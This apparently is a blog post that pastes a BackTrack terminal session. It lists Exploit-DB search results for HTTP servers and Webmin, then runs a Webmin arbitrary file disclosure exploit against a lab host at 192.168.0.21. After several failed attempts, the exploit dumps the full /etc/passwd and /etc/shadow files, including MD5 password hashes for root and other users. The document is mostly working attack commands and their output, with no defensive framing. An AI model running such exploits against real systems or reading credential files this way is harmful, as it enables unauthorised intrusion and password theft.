Buffer Overflow DoS /linux/dos/1746.pl
RaidenHTTPD 1.1.49 (SoftParserFileXml)
Remote Code Execution Exploit /windows/remote/2328.php
SHTTPD 1.34 (POST) Remote Buffer
Overflow Exploit /windows/remote/2482.pl
corehttp 0.5.3alpha (httpd) Remote
Buffer Overflow Exploit /linux/remote/4243.c
EDraw Office Viewer Component 5.1
HttpDownloadFile() Insecure Method /windows/remote/4290.html
Lighttpd <= 1.4.16 FastCGI Header
Overflow Remote Exploit /multiple/remote/4391.c
Airsensor M520 HTTPD Remote Preauth DoS
/ BOF PoC /hardware/dos/4426.pl
Lighttpd <= 1.4.17 FastCGI Header
Overflow Remote Exploit /linux/remote/4437.c
Simple HTTPD <= 1.38 Multiple Remote
Vulnerabilities /windows/remote/4700.txt
Simple HTTPD <= 1.38 Multiple Remote
Vulnerabilities /windows/remote/4700.txt
Simple HTTPD <= 1.41 (/aux) Remote
Denial of Service Exploit /windows/dos/4717.py
RaidenHTTPD 2.0.19 (ulang) Remote
Command Execution Exploit /windows/remote/4747.vbs
Ruby 1.8.6 (Webrick Httpd 1.3.1)
Directory Traversal Vulnerability /multiple/remote/5215.txt
VLC 0.8.6d httpd_FileCallBack Remote
Format String Exploit /windows/remote/5519.c
Samsung DVR SHR2040 HTTPD Remote Denial
of Service DoS PoC /hardware/dos/6394.pl
fhttpd 0.4.2 un64() Remote Denial of
Service Exploit /linux/dos/6493.pl
Linksys Wireless ADSL Router (WAG54G
V.2) httpd DoS Exploit /hardware/dos/7535.php
EDraw Office Viewer 5.4
HttpDownloadFile() Insecure Method Vuln
/windows/remote/7762.html
SW-HTTPD Server 0.x Remote Denial of
Service Exploit /multiple/dos/8245.c
httpdx <= 0.5b Multiple Remote
Denial of Service Vulnerabilities /windows/dos/8712.txt
httpdx <= 0.5b FTP Server (USER)
Remote BOF Exploit (SEH) /windows/remote/8716.py
httpdx <= 0.5b FTP Server (CWD)
Remote BOF Exploit (SEH) /windows/remote/8732.py
Lighttpd < 1.4.23 Source Code
Disclosure Vulnerability (BSD/Solaris bug)
/multiple/remote/8786.txt
httpdx <= 0.8 FTP Server
Delete/Get/Create Directories/Files Exploit
/windows/remote/8897.c
DD-WRT (httpd service) Remote Command
Execution Vulnerability /hardware/remote/9209.txt
DD-WRT (httpd service) Remote Command
Execution Vulnerability /hardware/remote/9209.txt
DD-WRT (httpd service) Remote Command
Execution Vulnerability /hardware/remote/9209.txt
DD-WRT (httpd service) Remote Command
Execution Vulnerability /hardware/remote/9209.txt
httpdx Web Server 1.4 (Host Header)
Remote Format String DoS Exploit /windows/dos/9657.pl
httpdx <= 1.4.6b source disclosure
/windows/webapps/9885.txt
httpdx 1.4 h_handlepeer BoF
/windows/remote/9886.txt
httpdx 1.4 Get Request Buffer Overflow
/windows/remote/10053.txt
OrzHTTPd Format String Exploit
/linux/remote/10282.py
httpdx v1.5.2 Remote Pre-Authentication
DoS (PoC crash) /windows/dos/11343.py
RCA DCM425 Cable Modem micro_httpd
DoS/PoC /hardware/dos/11597.py
httpdx v1.5.3b Multiple - Remote
Pre-Authentication DoS (PoC crash) /windows/dos/11734.py
Motorola SB5101 Hax0rware Rajko HTTPD
Remote Exploit PoC /hardware/dos/13774.pl
Httpdx 1.5.4 Multiple Denial of Service
Vulnerabilities (http-ftp) PoC /windows/dos/14683.py
httpdASM 0.92 Directory Traversal
/windows/remote/15861.txt
Caedo HTTPd Server v 0.5.1 ALPHA Remote
File Download /windows/remote/16075.pl
HTTPDX tolog() Function Format String
Vulnerability /windows/remote/16732.rb
SHTTPD <= 1.34 URI-Encoded POST
Request Overflow (win32) /win32/remote/16759.rb
HTTPDX tolog() Function Format String
Vulnerability /windows/remote/16794.rb
HTTPDX h_handlepeer() Function Buffer
Overflow /windows/remote/16799.rb
jHTTPd 0.1a Directory Traversal
Vulnerability /multiple/remote/17068.py
Simple HTTPd 1.42 Denial of Servive
Exploit /windows/dos/17658.py
Simple HTTPd 1.42 PUT Request Remote
Buffer Overflow Vulnerability /windows/remote/17669.py
Apache httpd Remote Denial of Service
(memory exhaustion) /multiple/dos/17696.pl
FleaHttpd Remote Denial Of Service
Exploit /linux/dos/18120.py
lighttpd Denial of Service
Vulnerability PoC /linux/dos/18295.
root@bt:/pentest/exploits/exploitdb#
./searchsploit webmin
Description
Path
---------------------------------------------------------------------------
-------------------------
Webmin BruteForce and Command Execution
Exploit /multiple/remote/705.pl
Webmin Web Brute Force v1.5
(cgi-version)
/multiple/remote/745.cgi
Webmin BruteForce + Command Execution
v1.5 /multiple/remote/746.pl
Webmin < 1.290 / Usermin < 1.220
Arbitrary File Disclosure Exploit /multiple/remote/1997.php
Webmin < 1.290 / Usermin < 1.220
Arbitrary File Disclosure Exploit (perl) /multiple/remote/2017.pl
phpMyWebmin 1.0 (window.php) Remote
File Include Vulnerability /php/webapps/2451.txt
phpMyWebmin 1.0 (window.php) Remote
File Include Vulnerability /php/webapps/2451.txt
phpMyWebmin <= 1.0 (target) Remote
File Include Vulnerabilities /php/webapps/2462.txt
phpMyWebmin <= 1.0 (target) Remote
File Include Vulnerabilities /php/webapps/2462.txt
phpMyWebmin <= 1.0 (target) Remote
File Include Vulnerabilities /php/webapps/2462.txt
root@bt:/pentest/exploits/exploitdb/platforms/multiple/remote#
perl 705.pl 192.168.0.21:10000
Webmin BruteForcer
usage:
705.pl <host> <command>
root@bt:/pentest/exploits/exploitdb/platforms/multiple/remote#
perl 706.pl 192.168.0.21:10000
Can't open perl script "706.pl":
No such file or directory
root@bt:/pentest/exploits/exploitdb/platforms/multiple#
cd remote/
root@bt:/pentest/exploits/exploitdb/platforms/multiple/remote#
perl 2017.pl 192.168.0.21:10000
Usage: 2017.pl <url> <port>
<filename> <target>
TARGETS are
0 - > HTTP
1 - > HTTPS
Define full path with file name
Example: ./webmin.pl blah.com 10000
/etc/passwd
root@bt:/pentest/exploits/exploitdb/platforms/multiple/remote#
perl 2017.pl 192.168.0.21:10000 /etc/psswd
Usage: 2017.pl <url> <port>
<filename> <target>
TARGETS are
0 - > HTTP
1 - > HTTPS
Define full path with file name
Example: ./webmin.pl blah.com 10000
/etc/passwd
root@bt:/pentest/exploits/exploitdb/platforms/multiple/remote#
perl 2017.pl 192.168.0.21 10000 /etc/psswd
Usage: 2017.pl <url> <port>
<filename> <target>
TARGETS are
0 - > HTTP
1 - > HTTPS
Define full path with file name
Example: ./webmin.pl blah.com 10000
/etc/passwd
root@bt:/pentest/exploits/exploitdb/platforms/multiple/remote#
perl 2017.pl 192.168.0.21 10000 /etc/passwd
Usage: 2017.pl <url> <port>
<filename> <target>
TARGETS are
0 - > HTTP
1 - > HTTPS
Define full path with file name
Example: ./webmin.pl blah.com 10000
/etc/passwd
root@bt:/pentest/exploits/exploitdb/platforms/multiple/remote#
perl 2017.pl 192.168.0.21 10000 /etc/shadow
Usage: 2017.pl <url> <port>
<filename> <target>
TARGETS are
0 - > HTTP
1 - > HTTPS
Define full path with file name
Example: ./webmin.pl blah.com 10000
/etc/passwd
root@bt:/pentest/exploits/exploitdb/platforms/multiple/remote#
perl 2017.pl 192.168.0.21 10000 /etc/psswd
Usage: 2017.pl <url> <port>
<filename> <target>
TARGETS are
0 - > HTTP
1 - > HTTPS
Define full path with file name
Example: ./webmin.pl blah.com 10000
/etc/passwd
root@bt:/pentest/exploits/exploitdb/platforms/multiple/remote#
perl 2017.pl 192.168.0.21 10000 /etc/passwd
Usage: 2017.pl <url> <port>
<filename> <target>
TARGETS are
0 - > HTTP
1 - > HTTPS
Define full path with file name
Example: ./webmin.pl blah.com 10000
/etc/passwd
root@bt:/pentest/exploits/exploitdb/platforms/multiple/remote#
perl 2017.pl 192.168.0.21 10000 /etc/shadow
Usage: 2017.pl <url> <port>
<filename> <target>
TARGETS are
0 - > HTTP
1 - > HTTPS
Define full path with file name
Example: ./webmin.pl blah.com 10000
/etc/passwd
root@bt:/pentest/exploits/exploitdb/platforms/multiple/remote#
perl 2017.pl 192.168.0.21 10000 /etc/shadow
Usage: 2017.pl <url> <port>
<filename> <target>
TARGETS are
0 - > HTTP
1 - > HTTPS
Define full path with file name
Example: ./webmin.pl blah.com 10000
/etc/passwd
root@bt:/pentest/exploits/exploitdb/platforms/multiple/remote#
perl 2017.pl 192.168.0.21 shadw 10000
Usage: 2017.pl <url> <port>
<filename> <target>
TARGETS are
0 - > HTTP
1 - > HTTPS
Define full path with file name
Example: ./webmin.pl blah.com 10000
/etc/passwd
root@bt:/pentest/exploits/exploitdb/platforms/multiple/remote#
perl 2017.pl 192.168.0.21 shadow 10000
Usage: 2017.pl <url> <port>
<filename> <target>
TARGETS are
0 - > HTTP
1 - > HTTPS
Define full path with file name
Example: ./webmin.pl blah.com 10000
/etc/passwd
root@bt:/pentest/exploits/exploitdb/platforms/multiple/remote#
perl 2017.pl 192.168.0.21
Usage: 2017.pl <url> <port>
<filename> <target>
TARGETS are
0 - > HTTP
1 - > HTTPS
Define full path with file name
Example: ./webmin.pl blah.com 10000
/etc/passwd
FILENAME: /etc/passwd
FILE CONTENT STARTED
-----------------------------------
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/bin/sh
bin:x:2:2:bin:/bin:/bin/sh
sys:x:3:3:sys:/dev:/bin/sh
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/bin/sh
man:x:6:12:man:/var/cache/man:/bin/sh
lp:x:7:7:lp:/var/spool/lpd:/bin/sh
mail:x:8:8:mail:/var/mail:/bin/sh
news:x:9:9:news:/var/spool/news:/bin/sh
uucp:x:10:10:uucp:/var/spool/uucp:/bin/sh
proxy:x:13:13:proxy:/bin:/bin/sh
www-data:x:33:33:www-data:/var/www:/bin/sh
backup:x:34:34:backup:/var/backups:/bin/sh
list:x:38:38:Mailing List
Manager:/var/list:/bin/sh
irc:x:39:39:ircd:/var/run/ircd:/bin/sh
gnats:x:41:41:Gnats Bug-Reporting
System (admin):/var/lib/gnats:/bin/sh
nobody:x:65534:65534:nobody:/nonexistent:/bin/sh
dhcp:x:100:101::/nonexistent:/bin/false
syslog:x:101:102::/home/syslog:/bin/false
klog:x:102:103::/home/klog:/bin/false
mysql:x:103:107:MySQL
Server,,,:/var/lib/mysql:/bin/false
sshd:x:104:65534::/var/run/sshd:/usr/sbin/nologin
vmware:x:1000:1000:vmware,,,:/home/vmware:/bin/bash
obama:x:1001:1001::/home/obama:/bin/bash
osama:x:1002:1002::/home/osama:/bin/bash
yomama:x:1003:1003::/home/yomama:/bin/bash
-------------------------------------
root@bt:/pentest/exploits/exploitdb/platforms/multiple/remote#
perl 2017.pl 192.168.0.21 10000 /etc/shadow 0
WEBMIN EXPLOIT !!!!! coded by UmZ!
Comments and Suggestions are welcome at
umz32.dll [at] gmail.com
Vulnerability disclose at
securitydot.net
I am just coding it in perl 'cuz I hate
PHP!
Attacking 192.168.0.21 on port 10000!
FILENAME: /etc/shadow
FILE CONTENT STARTED
-----------------------------------
root:$1$LKrO9Q3N$EBgJhPZFHiKXtK0QRqeSm/:14041:0:99999:7:::
daemon:*:14040:0:99999:7:::
bin:*:14040:0:99999:7:::
sys:*:14040:0:99999:7:::
sync:*:14040:0:99999:7:::
games:*:14040:0:99999:7:::
man:*:14040:0:99999:7:::
lp:*:14040:0:99999:7:::
mail:*:14040:0:99999:7:::
news:*:14040:0:99999:7:::
uucp:*:14040:0:99999:7:::
proxy:*:14040:0:99999:7:::
www-data:*:14040:0:99999:7:::
backup:*:14040:0:99999:7:::
list:*:14040:0:99999:7:::
irc:*:14040:0:99999:7:::
gnats:*:14040:0:99999:7:::
nobody:*:14040:0:99999:7:::
dhcp:!:14040:0:99999:7:::
syslog:!:14040:0:99999:7:::
klog:!:14040:0:99999:7:::
mysql:!:14040:0:99999:7:::
sshd:!:14040:0:99999:7:::
vmware:$1$7nwi9F/D$AkdCcO2UfsCOM0IC8BYBb/:14042:0:99999:7:::
obama:$1$hvDHcCfx$pj78hUduionhij9q9JrtA0:14041:0:99999:7:::
osama:$1$Kqiv9qBp$eJg2uGCrOHoXGq0h5ehwe.:14041:0:99999:7:::
yomama:$1$tI4FJ.kP$wgDmweY9SAzJZYqW76oDA.:14041:0:99999:7:::
passwd = Original File
shadow= system proteksi password
No comments:
Post a Comment